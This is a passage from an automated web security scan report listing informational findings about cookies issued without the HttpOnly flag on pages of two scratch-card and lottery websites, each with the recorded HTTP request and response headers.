Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:14 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47617


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.344. http://www.scratchcardheaven.com/Responsible.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:27 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51035


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.345. http://www.scratchcardheaven.com/SecurityAndPrivacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:26 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.346. http://www.scratchcardheaven.com/Terms.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:21 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107721


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.347. http://www.scratchcardheaven.com/UnderAge.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /UnderAge.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:29 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44047


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.348. http://www.svenskalotter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:44 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34553


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.349. http://www.svenskalotter.com/AboutUs.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /AboutUs.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:45 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37458


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.350. http://www.svenskalotter.com/Affiliates.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Affiliates.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Affiliates.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:53 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.351. http://www.svenskalotter.com/Charity.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Charity.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Charity.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:46 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.352. http://www.svenskalotter.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:51 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42942


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.353. http://www.svenskalotter.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /FairPlay.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:47 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37156


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.354. http://www.svenskalotter.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Help.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:48 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.355. http://www.svenskalotter.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: www.svenskalotter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=flbkb455khvf04450vdrfe45; path=/; HttpOnly
Set-Cookie: CSI_38=EncryptedUniqueVisitorID=0B0F1C435808DDA7C375069D1945E754&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=svenskalotter.com; expires=Fri, 16-May-2031 11:41:58 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: UniqueVisitorID=0B0F1C435808DDA7C375069D1945E754; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: LanguageCode=SWE; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=svenskalotter.com; expires=Fri, 16-May-2014 11:41:58 GMT; path=/
Set-Cookie: CSITemp=38; domain=svenskalotter.com; path=/
Vary: Accept-Encoding
Content-Length: 34553


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.356. http://www.svenskalotter.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.svenskalotter.com
Path:   /InviteFriend.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.svenskalotter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=62D174B71D19D304565CA856AD1DA299; LanguageCode=SWE; RegistrationMode=PM; CSI_38=EncryptedUniqueVisitorID=62D174B71D19D304565CA856AD1DA299&AffiliateID=38&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; CountryCode=US; CSITemp=38; ASP.NET_SessionId=ysimfk55bzxydeaewbrhme45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:36:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
Set-Cookie: BO=FM; domain=svenskalotter.com; expires=Fri, 16-May-2014 12:36:49 GMT; path=/
